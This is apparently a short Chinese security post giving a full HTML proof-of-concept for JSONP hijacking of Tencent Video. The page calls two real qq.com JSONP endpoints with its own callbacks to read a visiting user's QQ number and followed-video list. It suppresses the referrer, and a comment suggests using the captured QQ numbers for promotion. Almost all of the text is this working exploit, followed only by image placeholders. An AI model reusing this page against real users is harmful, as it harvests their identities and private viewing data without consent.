0x01 测试html代码

  1. <!DOCTYPE html>
  2. <html lang='en'>
  4. <head>
  5.     <meta name="referrer" content="never" charset="utf-8">
  6.     <title>jsonp劫持</title>
  7. </head>
  9. <body>
  10.     https://v.qq.com jsonp劫持
  11. </body>
  12.     <!-- 劫持用户qq号 可用于推广 -->
  13.     <script>function jc(data){alert(JSON.stringify(data));}</script> 
  14.     <script src="http://node.video.qq.com/x/api/get_2029?callback=jc&_=1542534620161"></script>
  16.     <!-- 劫持用户看单数据 -->
  17.     <script>function jc2(data){alert(JSON.stringify(data));}</script> 
  18.     <script src="http://like.video.qq.com/fcgi-bin/flw_new?otype=json&sn=FollowServer&cmd=2562&pidx=0&size=30&dtype=0&type=0&callback=jc2&_=1542536629083"></script>
  19. </html>

0x02 漏洞测试

1.png2.png3.png